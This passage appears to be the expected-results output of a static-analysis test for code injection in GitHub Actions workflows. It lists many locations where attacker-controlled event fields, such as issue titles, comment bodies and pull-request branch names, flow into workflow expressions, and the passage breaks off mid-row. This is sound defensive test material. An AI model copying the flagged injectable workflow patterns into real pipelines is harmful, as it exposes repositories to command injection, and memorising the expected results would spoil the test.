.github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | .github/workflows/discussion.yml:1:5:1:14 | discussion | discussion | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | .github/workflows/discussion.yml:1:5:1:14 | discussion | discussion | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | discussion_comment | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | discussion_comment | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | discussion_comment | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | .github/workflows/image_link_generator.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:3:3:3:8 | issues | issues | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/level1.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | .github/workflows/simple2.yml:3:6:3:24 | pull_request_target | pull_request_target | +| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | ${{ steps.command.outputs.command-arguments }} | .github/workflows/slash_command2.yml:2:5:2:17 | issue_comment | issue_comment | +| .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | .github/workflows/test1.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | .github/workflows/test1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test3.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | .github/workflows/test5.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | ${{ steps.comment-branch.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | issue_comment | +| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | issue_comment | +| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). 
